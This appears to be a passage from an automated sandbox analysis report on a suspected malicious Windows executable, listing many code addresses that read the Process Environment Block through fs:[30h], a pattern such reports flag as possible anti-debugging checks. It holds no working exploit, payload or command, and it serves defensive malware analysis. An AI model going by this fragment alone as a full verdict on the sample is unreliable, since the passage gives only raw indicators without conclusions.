          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017583C0 mov eax, dword ptr fs:[00000030h]2_2_017583C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D63C0 mov eax, dword ptr fs:[00000030h]2_2_017D63C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0182634F mov eax, dword ptr fs:[00000030h]2_2_0182634F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0181A352 mov eax, dword ptr fs:[00000030h]2_2_0181A352
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748397 mov eax, dword ptr fs:[00000030h]2_2_01748397
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748397 mov eax, dword ptr fs:[00000030h]2_2_01748397
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01748397 mov eax, dword ptr fs:[00000030h]2_2_01748397
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177438F mov eax, dword ptr fs:[00000030h]2_2_0177438F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177438F mov eax, dword ptr fs:[00000030h]2_2_0177438F
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E388 mov eax, dword ptr fs:[00000030h]2_2_0174E388
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E388 mov eax, dword ptr fs:[00000030h]2_2_0174E388
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E388 mov eax, dword ptr fs:[00000030h]2_2_0174E388
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754260 mov eax, dword ptr fs:[00000030h]2_2_01754260
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754260 mov eax, dword ptr fs:[00000030h]2_2_01754260
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754260 mov eax, dword ptr fs:[00000030h]2_2_01754260
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174826B mov eax, dword ptr fs:[00000030h]2_2_0174826B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174A250 mov eax, dword ptr fs:[00000030h]2_2_0174A250
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01756259 mov eax, dword ptr fs:[00000030h]2_2_01756259
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D8243 mov eax, dword ptr fs:[00000030h]2_2_017D8243
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D8243 mov ecx, dword ptr fs:[00000030h]2_2_017D8243
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174823B mov eax, dword ptr fs:[00000030h]2_2_0174823B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018262D6 mov eax, dword ptr fs:[00000030h]2_2_018262D6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602E1 mov eax, dword ptr fs:[00000030h]2_2_017602E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602E1 mov eax, dword ptr fs:[00000030h]2_2_017602E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602E1 mov eax, dword ptr fs:[00000030h]2_2_017602E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175A2C3 mov eax, dword ptr fs:[00000030h]2_2_0175A2C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180A250 mov eax, dword ptr fs:[00000030h]2_2_0180A250
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180A250 mov eax, dword ptr fs:[00000030h]2_2_0180A250
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602A0 mov eax, dword ptr fs:[00000030h]2_2_017602A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017602A0 mov eax, dword ptr fs:[00000030h]2_2_017602A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov ecx, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E62A0 mov eax, dword ptr fs:[00000030h]2_2_017E62A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0182625D mov eax, dword ptr fs:[00000030h]2_2_0182625D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01800274 mov eax, dword ptr fs:[00000030h]2_2_01800274
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E284 mov eax, dword ptr fs:[00000030h]2_2_0178E284
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E284 mov eax, dword ptr fs:[00000030h]2_2_0178E284
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D0283 mov eax, dword ptr fs:[00000030h]2_2_017D0283
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D0283 mov eax, dword ptr fs:[00000030h]2_2_017D0283
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D0283 mov eax, dword ptr fs:[00000030h]2_2_017D0283
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178656A mov eax, dword ptr fs:[00000030h]2_2_0178656A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178656A mov eax, dword ptr fs:[00000030h]2_2_0178656A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178656A mov eax, dword ptr fs:[00000030h]2_2_0178656A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758550 mov eax, dword ptr fs:[00000030h]2_2_01758550
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758550 mov eax, dword ptr fs:[00000030h]2_2_01758550
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760535 mov eax, dword ptr fs:[00000030h]2_2_01760535
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E53E mov eax, dword ptr fs:[00000030h]2_2_0177E53E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017E6500 mov eax, dword ptr fs:[00000030h]2_2_017E6500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01824500 mov eax, dword ptr fs:[00000030h]2_2_01824500
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177E5E7 mov eax, dword ptr fs:[00000030h]2_2_0177E5E7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017525E0 mov eax, dword ptr fs:[00000030h]2_2_017525E0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C5ED mov eax, dword ptr fs:[00000030h]2_2_0178C5ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C5ED mov eax, dword ptr fs:[00000030h]2_2_0178C5ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017565D0 mov eax, dword ptr fs:[00000030h]2_2_017565D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A5D0 mov eax, dword ptr fs:[00000030h]2_2_0178A5D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A5D0 mov eax, dword ptr fs:[00000030h]2_2_0178A5D0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E5CF mov eax, dword ptr fs:[00000030h]2_2_0178E5CF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E5CF mov eax, dword ptr fs:[00000030h]2_2_0178E5CF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017745B1 mov eax, dword ptr fs:[00000030h]2_2_017745B1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017745B1 mov eax, dword ptr fs:[00000030h]2_2_017745B1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D05A7 mov eax, dword ptr fs:[00000030h]2_2_017D05A7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D05A7 mov eax, dword ptr fs:[00000030h]2_2_017D05A7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D05A7 mov eax, dword ptr fs:[00000030h]2_2_017D05A7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E59C mov eax, dword ptr fs:[00000030h]2_2_0178E59C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01784588 mov eax, dword ptr fs:[00000030h]2_2_01784588
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01752582 mov eax, dword ptr fs:[00000030h]2_2_01752582
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01752582 mov ecx, dword ptr fs:[00000030h]2_2_01752582
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177A470 mov eax, dword ptr fs:[00000030h]2_2_0177A470
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177A470 mov eax, dword ptr fs:[00000030h]2_2_0177A470
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177A470 mov eax, dword ptr fs:[00000030h]2_2_0177A470
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180A49A mov eax, dword ptr fs:[00000030h]2_2_0180A49A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DC460 mov ecx, dword ptr fs:[00000030h]2_2_017DC460
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174645D mov eax, dword ptr fs:[00000030h]2_2_0174645D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0177245A mov eax, dword ptr fs:[00000030h]2_2_0177245A
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178E443 mov eax, dword ptr fs:[00000030h]2_2_0178E443
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174C427 mov eax, dword ptr fs:[00000030h]2_2_0174C427
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E420 mov eax, dword ptr fs:[00000030h]2_2_0174E420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E420 mov eax, dword ptr fs:[00000030h]2_2_0174E420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0174E420 mov eax, dword ptr fs:[00000030h]2_2_0174E420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h]2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h]2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h]2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h]2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h]2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h]2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D6420 mov eax, dword ptr fs:[00000030h]2_2_017D6420
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01788402 mov eax, dword ptr fs:[00000030h]2_2_01788402
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01788402 mov eax, dword ptr fs:[00000030h]2_2_01788402
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01788402 mov eax, dword ptr fs:[00000030h]2_2_01788402
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017504E5 mov ecx, dword ptr fs:[00000030h]2_2_017504E5
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017844B0 mov ecx, dword ptr fs:[00000030h]2_2_017844B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DA4B0 mov eax, dword ptr fs:[00000030h]2_2_017DA4B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0180A456 mov eax, dword ptr fs:[00000030h]2_2_0180A456
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017564AB mov eax, dword ptr fs:[00000030h]2_2_017564AB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01758770 mov eax, dword ptr fs:[00000030h]2_2_01758770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01760770 mov eax, dword ptr fs:[00000030h]2_2_01760770
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DE75D mov eax, dword ptr fs:[00000030h]2_2_017DE75D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_018047A0 mov eax, dword ptr fs:[00000030h]2_2_018047A0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750750 mov eax, dword ptr fs:[00000030h]2_2_01750750
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D4755 mov eax, dword ptr fs:[00000030h]2_2_017D4755
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792750 mov eax, dword ptr fs:[00000030h]2_2_01792750
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792750 mov eax, dword ptr fs:[00000030h]2_2_01792750
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178674D mov esi, dword ptr fs:[00000030h]2_2_0178674D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178674D mov eax, dword ptr fs:[00000030h]2_2_0178674D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178674D mov eax, dword ptr fs:[00000030h]2_2_0178674D
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178273C mov eax, dword ptr fs:[00000030h]2_2_0178273C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178273C mov ecx, dword ptr fs:[00000030h]2_2_0178273C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178273C mov eax, dword ptr fs:[00000030h]2_2_0178273C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CC730 mov eax, dword ptr fs:[00000030h]2_2_017CC730
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C720 mov eax, dword ptr fs:[00000030h]2_2_0178C720
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C720 mov eax, dword ptr fs:[00000030h]2_2_0178C720
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01750710 mov eax, dword ptr fs:[00000030h]2_2_01750710
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01780710 mov eax, dword ptr fs:[00000030h]2_2_01780710
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C700 mov eax, dword ptr fs:[00000030h]2_2_0178C700
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017547FB mov eax, dword ptr fs:[00000030h]2_2_017547FB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017547FB mov eax, dword ptr fs:[00000030h]2_2_017547FB
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017727ED mov eax, dword ptr fs:[00000030h]2_2_017727ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017727ED mov eax, dword ptr fs:[00000030h]2_2_017727ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017727ED mov eax, dword ptr fs:[00000030h]2_2_017727ED
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017DE7E1 mov eax, dword ptr fs:[00000030h]2_2_017DE7E1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175C7C0 mov eax, dword ptr fs:[00000030h]2_2_0175C7C0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D07C3 mov eax, dword ptr fs:[00000030h]2_2_017D07C3
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017507AF mov eax, dword ptr fs:[00000030h]2_2_017507AF
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017F678E mov eax, dword ptr fs:[00000030h]2_2_017F678E
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01782674 mov eax, dword ptr fs:[00000030h]2_2_01782674
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A660 mov eax, dword ptr fs:[00000030h]2_2_0178A660
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A660 mov eax, dword ptr fs:[00000030h]2_2_0178A660
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176C640 mov eax, dword ptr fs:[00000030h]2_2_0176C640
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176E627 mov eax, dword ptr fs:[00000030h]2_2_0176E627
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01786620 mov eax, dword ptr fs:[00000030h]2_2_01786620
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01788620 mov eax, dword ptr fs:[00000030h]2_2_01788620
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0175262C mov eax, dword ptr fs:[00000030h]2_2_0175262C
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01792619 mov eax, dword ptr fs:[00000030h]2_2_01792619
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE609 mov eax, dword ptr fs:[00000030h]2_2_017CE609
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176260B mov eax, dword ptr fs:[00000030h]2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176260B mov eax, dword ptr fs:[00000030h]2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176260B mov eax, dword ptr fs:[00000030h]2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176260B mov eax, dword ptr fs:[00000030h]2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176260B mov eax, dword ptr fs:[00000030h]2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176260B mov eax, dword ptr fs:[00000030h]2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0176260B mov eax, dword ptr fs:[00000030h]2_2_0176260B
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D06F1 mov eax, dword ptr fs:[00000030h]2_2_017D06F1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017D06F1 mov eax, dword ptr fs:[00000030h]2_2_017D06F1
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE6F2 mov eax, dword ptr fs:[00000030h]2_2_017CE6F2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE6F2 mov eax, dword ptr fs:[00000030h]2_2_017CE6F2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE6F2 mov eax, dword ptr fs:[00000030h]2_2_017CE6F2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017CE6F2 mov eax, dword ptr fs:[00000030h]2_2_017CE6F2
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0178A6C7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178A6C7 mov eax, dword ptr fs:[00000030h]2_2_0178A6C7
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_017866B0 mov eax, dword ptr fs:[00000030h]2_2_017866B0
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_0178C6A6 mov eax, dword ptr fs:[00000030h]2_2_0178C6A6
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754690 mov eax, dword ptr fs:[00000030h]2_2_01754690
          Source: C:\Users\user\Desktop\n0srYVYMDI.exeCode function: 2_2_01754690 mov eax, dword ptr fs:[00000030h]2_2_01754690
